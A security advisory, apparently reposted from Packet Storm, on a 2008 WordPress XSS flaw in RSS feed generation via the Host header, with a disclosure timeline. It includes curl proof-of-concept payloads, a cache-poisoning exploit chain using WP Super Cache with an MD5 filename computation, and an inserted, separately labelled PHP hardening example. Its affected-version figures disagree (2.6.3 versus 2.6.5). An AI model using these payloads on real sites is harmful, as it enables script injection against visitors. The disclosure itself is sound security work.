ID PACKETSTORM:72277 Type packetstorm Reporter Jeremias Reith Modified 2008-11-25T00:00:00
Description
===== noXSS.org Security Advisory ======
Advisory: WordPress XSS vulnerability in RSS Feed Generator
Author: Jeremias Reith <jr@noxss.org>
Published: 2008/11/25
Affected: WordPress < 2.6.5
Summary
=======
WordPress prior to v2.6.3 fails to sanitize the Host header variable
correctly when generating RSS feeds and is therefore prone to XSS
attacks.
Web sites running in a name-based virtual hosting setup are not
affected as long as they are not the default virtual host.
Moreover, we only found installations running on the Apache web server
to be affected.
Vulnerability Details
=====================
The function self_link() in wp-includes/feed.php is used to generate
absolute URLs for the <atom:link> tag in ATOM and RSS 2.0 feeds:
    function self_link() {
        echo 'http'
            . ( $_SERVER['https'] == 'on' ? 's' : '' ) . '://'
            . $_SERVER['HTTP_HOST']
            . wp_specialchars(stripslashes($_SERVER['REQUEST_URI']), 1);
    }
The function does not sanitize the HTTP_HOST variable in any way but
WordPress replaces all $_SERVER variables with escaped ones in
wp-settings.php:
    $_SERVER = add_magic_quotes($_SERVER);
In almost all setups add_magic_quotes() runs
mysql_real_escape_string() over the elements and returns the modified
array. Unfortunately this escaping method is not safe in markup
context.
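The escaping mismatch described above, shown side by side with one hardened variant. This is an added example, not code from the advisory or from WordPress; the allowlist of accepted hostnames is an assumption standing in for whatever the site's configuration provides, and the injected Host value is constructed.

```php
<?php
// Added example (not WordPress or advisory code): SQL-style escaping versus
// attribute-context escaping for the host part of a feed self-link.

// Constructed Host header value carrying a double quote and a tag.
$rawHost    = '"><b>injected</b>';
$requestUri = '/blog/feed';

// Mirrors the vulnerable pattern: add_magic_quotes()-style escaping (here
// addslashes(), which has the same effect on '"'), then the value is echoed
// into an attribute unchanged. A backslash means nothing to an HTML parser,
// so the '"' still terminates href and the tag after it becomes live markup.
function self_link_vulnerable(string $host, string $uri): string {
    $host = addslashes($host);
    return '<atom:link href="http://' . $host
        . htmlspecialchars(stripslashes($uri), ENT_QUOTES, 'UTF-8')
        . '" rel="self" type="application/rss+xml" />';
}

// Hardened variant. Assumption: the hostnames the site is allowed to answer
// for are known from configuration ($allowedHosts, hypothetical). The Host
// header is used only if it matches that allowlist exactly, otherwise the
// first configured name is used, and the whole URL is escaped for attribute
// context rather than for SQL.
function self_link_hardened(string $untrustedHost, string $uri, array $allowedHosts): string {
    // Drop an optional :port suffix and normalise case before comparing.
    $hostOnly = strtolower(preg_replace('/:\d+$/', '', $untrustedHost));
    $host = in_array($hostOnly, $allowedHosts, true) ? $hostOnly : $allowedHosts[0];
    $href = 'http://' . $host . stripslashes($uri);
    return '<atom:link href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8')
        . '" rel="self" type="application/rss+xml" />';
}

// The first line reproduces the broken attribute the advisory observed; the
// second keeps the attacker-controlled header out of the markup entirely.
echo self_link_vulnerable($rawHost, $requestUri), "\n";
echo self_link_hardened($rawHost, $requestUri, ['www.example.org']), "\n";
```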
PoC
====
The Apache web server only disallows '/', '\' and '..' within the host
header. The header can therefore contain markup making the following
PoC possible:
    curl -H "Host: \"><body onload=alert(String.fromCharCode(88,83,83))>" \
        http://www.example.org/blog/feed
The given example request will return (without additional newlines):
-- snip --
...
<atom:link href="http://\">
<body onload=alert(String.fromCharCode(88,83,83))>
/blog/feed" rel="self" type="application/rss+xml" />
...
-- snip --
The embedded JavaScript will be executed in Firefox 3.0.4 due to the
triggered switch to Quirks mode.
Exploit
=======
The following exploit is a semi-stored XSS attack and has been tested
with the following setup:
- Apache 2.x with IP based virtual hosting
- WordPress 2.6.3 installed in /blog/
- WP Super Cache 0.84
- Firefox 3.0.4
WP Super Cache is a popular WordPress plugin that adds static file
caching to WordPress. It greatly increases performance and is
often used. It saves generated pages in the wp-content/cache directory
and adds mod_rewrite rules to serve cached pages statically.
Issuing a malicious request to a vulnerable WordPress installation
causes a file containing the XSS payload to be generated and placed
within the document root.
Request:
    curl -H "Host: \"><body onload=alert(String.fromCharCode(88,83,83))>" \
        http://www.example.org/blog/feed
Generated file:
    http://example.org/blog/wp-content/cache/wp-cache-#md5sum#.html
Firefox will execute the embedded JavaScript even though the feed is
XML, because the file is served as text/html.
The only missing step is calculating the cached file's MD5 sum.
The following command generates the MD5 checksum:
    php -r 'echo md5("\"><body onload=alert(String.fromCharCode(88,83,83))>" . "/blog/feed"), "\n";'
In the default setup the MD5 sum can be generated by concatenating the
contents of HTTP_HOST and REQUEST_URI resulting in
0d2ca4617758433a7864d57493be2c5b for the given example.
This file can be accessed until the cache expiration mechanism removes
it. The default expire time is 3600 seconds.
Vendor Response
===============
2008-11-17 Reported to vendor
2008-11-17 Initial response from vendor
2008-11-25 Release of version 2.6.5